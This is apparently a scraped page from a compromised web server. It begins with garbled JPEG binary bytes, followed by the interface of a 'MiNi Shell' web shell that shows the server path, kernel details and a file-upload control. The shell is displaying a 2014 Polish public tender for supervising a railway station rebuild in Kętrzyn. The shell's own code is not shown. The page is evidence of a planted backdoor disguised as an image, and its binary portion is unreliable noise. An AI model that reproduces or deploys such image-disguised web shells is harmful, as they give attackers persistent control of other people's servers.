JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140430/146906-N-2014.html

<p class="kh_header"><b>Kętrzyn: Pełnienie nadzoru konserwatorskiego i nadzoru inwestorskiego nad inwestycją: Przebudowa budynku dworca kolejowego w branżach: konstrukcyjno-budowlanej,  sanitarnej, elektrycznej i telekomunikacyjnej</b><br>
<b>Numer ogłoszenia: 146906 - 2014; data zamieszczenia: 30.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru konserwatorskiego i nadzoru inwestorskiego nad inwestycją: Przebudowa budynku dworca kolejowego w branżach: konstrukcyjno-budowlanej,  sanitarnej, elektrycznej i telekomunikacyjnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest pełnienie nadzoru konserwatorskiego i nadzoru inwestorskiego nad inwestycją: Przebudowa budynku dworca kolejowego w branżach: konstrukcyjno - budowlanej, drogowej, sanitarnej, elektrycznej i telekomunikacyjnej w następującym zakresie:
1) 1. Nadzór inwestorski w branży konstrukcyjno - budowlanej w zakresie:
BUDYNEK GŁÓWNY DWORCA:
- roboty rozbiórkowe;
- budowa wszystkich kominów wentylacyjnych i spalinowych;
- odgruzowanie pomieszczeń piwnicznych;
- kompletny remont pomieszczeń: -1/09, -1/10, -1/15, -1/16, 1/08, 1/09, 1/10, 1/11, 1/12, 1/13, 1/14, 1/15, 1/16, 1/17, 1/18, 1/19, 1/20, 1/21, 1/23, 2/13;
- wykonanie remontu ściany słupowo - ryglowej;
- wykonanie ściany sali konferencyjnej od strony poczekalni;
- wykonanie stropu nad parterem (nad pomieszczeniami od numeru 2/01 do 2/12) łącznie z wymianą belek stropowych, wzmocnieniem belek stropowych opisanych dokumentacją projektową;
- wykonanie wzmocnień i przebudowy konstrukcji dachu nad pomieszczeniami od numeru 2/01 do 2/12 łącznie z konstrukcją więźby przy czerpni i wyrzutni powietrza w zakresie opisanym dokumentacją projektową;
- remont konstrukcji dachu pomiędzy ścianą słupowo - ryglową a ścianą witrynową sali konferencyjnej;
- wykonanie witryn, balustrad, stolarki otworowej w częściach remontowanych budynku;
- wykonanie robót konstrukcyjnych w częściach remontowanych budynku;
- wykonanie robót konstrukcyjnych nadproży w ścianach zewnętrznych;
- wymiana zewnętrznej stolarki otworowej okiennej i drzwiowej; 
BUDYNEK SANITARIATOW:
- roboty rozbiórkowe w całym budynku od wewnątrz;
- wykonanie nowego podziału funkcyjnego w postaci wykonania ścian wewnętrznych;
- wykonanie wentylacji;
- wykonanie kompletnego remontu pomieszczeń 1/07, 1/08, 1/09;
- montaż stolarki drzwiowej wewnętrznej w remontowanych pomieszczeniach;
- wykonanie robót konstrukcyjnych w częściach remontowanych budynku;
- wykonanie kompletnego stropu w remontowanych pomieszczeniach;
- wykonanie wzmocnienia całej konstrukcji dachu;
- wykonanie nadproży w otworach zewnętrznych budynku;
- wymiana zewnętrznej stolarki otworowej okiennej i drzwiowej; 
1) 2.Nadzór inwestorski w branży sanitarnej w zakresie:
- wykonania przyłącza wodociągowego oraz sieci wodociągowej pomiędzy budynkiem dworca a budynkiem sanitariatów;
- wykonania dwóch przyłączy kanalizacji sanitarnej do budynku dworca oraz jednego przyłącza kanalizacji sanitarnej do budynku sanitariatów;
- wykonania przyłącza kanalizacji deszczowej oraz sieci kanalizacji deszczowej;
- wykonanie kompletnej technologii kotłowni;
- wykonanie instalacji wodno - kanalizacyjnej związanej z funkcjonowaniem remontowanych pomieszczeń łącznie z urządzeniami, armaturą i białym montażem;
- budowa wszystkich pionów kanalizacji sanitarnej łącznie z wyprowadzeniem ponad połać dachową - zgodnie z dokumentacją projektową. 
- wykonanie instalacji hydrantowej wraz z wyposażeniem w pomieszczeniach przeznaczonych do remontu;
- wykonanie instalacji centralnego ogrzewania i ciepła technologicznego wraz z wyposażeniem w pomieszczeniach przeznaczonych do remontu;
- wykonanie instalacji wentylacji mechanicznej w pomieszczeniach przeznaczonych do remontu;

1) 3. Nadzór inwestorski w branży elektrycznej w zakresie:
- wykonania elektroenergetycznych linii kablowych zewnętrznych ze złącza kablowego do rozdzielnicy głównej budynku i z rozdzielnicy głównej do poszczególnych rozdzielnic zlokalizowanych w budynku sanitariatów oraz związanych z przeniesienie urządzeń elektroenergetycznych PKP;
- wykonanie okablowania związanego z iluminacją budynku;
- wykonanie rozdzielnicy głównej budynku;
- przeniesienie wszystkich urządzeń elektroenergetycznych PKP SA z budynku dworca do budynku sanitariatów w zakresie opisanym dokumentacją projektową;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.KT i wszystkich instalacji związanych z funkcjonowaniem kotłowni;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.AD i wszystkich instalacji i urządzeń związanych z funkcjonowaniem pomieszczeń całej piwnicy i remontowanych pomieszczeń;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.HD i wszystkich instalacji i urządzeń związanych z funkcjonowaniem remontowanych pomieszczeń;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R. POZ oraz urządzeń związanych z podtrzymaniem energii i wszystkich instalacji związanych z funkcjonowaniem remontowanych pomieszczeń; 
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.B2 i wszystkich instalacji i urządzeń związanych z funkcjonowaniem remontowanych pomieszczeń;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.EN i wszystkich instalacji i urządzeń związanych z funkcjonowaniem remontowanych pomieszczeń;
- wykonanie wewnętrznej linii zasilania oraz rozdzielnicy R.TK i wszystkich instalacji i urządzeń związanych z funkcjonowaniem remontowanych pomieszczeń;
- wykonanie pozostałych wewnętrznych linii zasilania w zakresie od rozdzielni głównej do miejsca lokalizacji danej rozdzielnicy;

1) 4. Nadzór inwestorski w branży telekomunikacyjnej w zakresie:
- wykonania wewnętrznych linii instalacji teletechnicznej pomiędzy budynkiem dworca a budynkiem sanitariatów;
- wykonanie robót związanych z branżą telekomunikacyjną w częściach remontowanych budynku;
- przeniesienie wszystkich urządzeń TK TELEKOM Sp. z o.o. z budynku dworca do budynku sanitariatów; 
- montaż zestawów intercom w pomieszczeniach kasowych;
- niezbędne do wykonania okablowanie branży telekomunikacyjne należy doprowadzić do miejsca zaprojektowanej szafy GPD również z wyremontowanego budynku sanitariatów. Na czas robót budowlanych należy przenieść aktualne przyłącza telekomunikacyjne do obsługi kasy PKP S.A. do pomieszczeń aktualnych kas spółki Arriva Sp. z o.o. z siedzibą w 87-100 Toruń, ul. Dąbrowskiego 8/24 zlokalizowanych w pomieszczeniach parteru o numerze 1/01, 1/02. Po wykonaniu remontu należy przenieść przyłącza telekomunikacyjne spółki Arriva Sp. z o.o. z siedzibą w 87-100 Toruń, ul. Dąbrowskiego 8/24 i kasy PKP S.A. do miejsca zaprojektowanej szafy GPD i uruchomić je poprzez nowo wykonane okablowanie telekomunikacyjne. 
1) 5. Nadzór konserwatorski nad powyższym zakresem robót budowlanych;

2) Szczegółowy zakres zamówienia zawiera dokumentacja projektowa pn.: Projekt budowlany i wykonawczy remontu i przebudowy zabytkowego budynku dworca oraz remontu, przebudowy i zmiany sposobu użytkowania budynku sanitariatów na budynek usługowy z zapleczem technicznym PKP, wraz ze zmianą sposobu zagospodarowania terenu wykonana przez Zakład Usług Technicznych Architekt Wanda Grodzka z siedzibą w 80-541 Gdańsk Nowy Port, ul. Bliska 1B/5 - załącznik nr 1 do umowy i stanowiąca jej integralną część -  umieszczona na stronie:
http://bip.warmia.mazury.pl/ketrzyn_gmina_miejska/zamowienia_publiczne/110/97/Przebudowa_budynku_dworca_kolejowego/
3)	Wykonanie przedmiotu zamówienia będzie realizowane ze środków własnych Zamawiającego.
4)	Szczegółowe informacje dotyczące wykonania zamówienia zawierają istotne postanowienia umowy, stanowiący załącznik nr 6 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1)	Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych.
2)	Zamówienia uzupełniające polegałyby na powtórzeniu tego samego rodzaju zamówienia podstawowego, zdefiniowanego w SIWZ. 
3)	Wielkość zamówień uzupełniających określa się maksymalnie jako 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane wniesienie wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi wykazać dysponowanie:
a) co najmniej jedną osobą posiadającą uprawnienia budowlane wykonawcze lub wykonawcze i projektowe w specjalności konstrukcyjno - budowlanej upoważniające do  sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania lub kierowania i projektowania lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. 
Osoba ta musi posiadać doświadczenie w nadzorowaniu  budowy, przebudowy lub remontu co najmniej jednego budynku w branży konstrukcyjno - budowlanej. 
Osoba ta musi spełniać wymagania §24 ust. 2 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011r. nr 165 poz. 987 ze zm.) tj. Kierować robotami budowlanymi oraz wykonywać nadzór inwestorski przy zabytkach nieruchomych wpisanych do rejestru zabytków mogą osoby, które  odbyły co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków.
b) co najmniej jedną osobą posiadającą uprawnienia budowlane wykonawcze lub wykonawcze i projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń ciepłowniczych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń upoważniające do  sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania lub kierowania i projektowania lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności. 
Osoba ta musi posiadać doświadczenie w nadzorowaniu  budowy, przebudowy lub remontu co najmniej jednej inwestycji w branży sanitarnej.
c) co najmniej jedną osobą posiadającą uprawnienia budowlane wykonawcze lub wykonawcze i projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych  bez ograniczeń upoważniające do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania lub kierowania i projektowania lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności.  
Osoba ta musi posiadać doświadczenie w nadzorowaniu  budowy, przebudowy lub remontu co najmniej jednego budynku w branży elektrycznej.
d) co najmniej jedną osobą posiadającą uprawnienia budowlane wykonawcze lub wykonawcze i projektowe w specjalności telekomunikacyjnej bez ograniczeń upoważniające do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie kierowania lub kierowania 
i projektowania lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w tej specjalności.  
Osoba ta musi posiadać doświadczenie w nadzorowaniu  budowy, przebudowy lub remontu co najmniej jednego budynku w branży telekomunikacyjnej.
e)  co najmniej jedną osobą spełniającą wymagania §22 ust. 1 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. z 2011r. nr 165 poz. 987 ze zm.) tj. Prace konserwatorskie, prace restauratorskie oraz badania konserwatorskie może prowadzić, w zakresie specjalności określonej w dyplomie ukończenia studiów, osoba, która posiada tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych:
1)na kierunku konserwacja i restauracja dzieł sztuki lub
2)w specjalności w zakresie konserwacji zabytków
-oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.
Osoba ta musi posiadać doświadczenie w nadzorowaniu konserwatorskim  przebudowy lub remontu co najmniej jednego budynku.
2. Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował osobami niezbędnymi do wykonania zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia.
Z treści powyższego oświadczenia (zobowiązania podmiotu trzeciego) lub innego dokumentu, musi jasno wynikać: kto jest podmiotem przyjmującym zasoby, jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu, w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia, jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem, jaki jest zakres i w jakim okresie inny podmiot  będzie brał udział przy wykonywaniu zamówienia. Przedmiotowe pisemne zobowiązanie należy dołączyć do oferty w oryginale.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy ponadto dołączyć:
1) wypełniony i podpisany formularz oferty- zał. nr 1 do SIWZ
2) pełnomocnictwo, jeśli konieczne</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2. Strony przewidują możliwość zmiany postanowień  umowy w następujących przypadkach:
a) zmiana sposobu fakturowania w przypadku zmian organizacyjnych oraz wewnętrznych uwarunkowań podmiotów wymienionych w preambule umowy,
b) wystąpienia zdarzeń niezależnych od stron umowy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, bez zwiększania ustalonego wynagrodzenia,
c) zmiany terminu realizacji zamówienia z powodu:
- przedłużenia realizacji inwestycji: Przebudowa budynku dworca kolejowego, 
- ze względu na  niezawinione przyczyny spowodowane przez tzw. siłę wyższą .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta, 11-400 Kętrzyn, ul. Wojska Polskiego 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2014 godzina 09:00, miejsce: Urząd Miasta, 11-400 Kętrzyn, ul. Wojska Polskiego 11, Punkt Informacyjny (parter Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com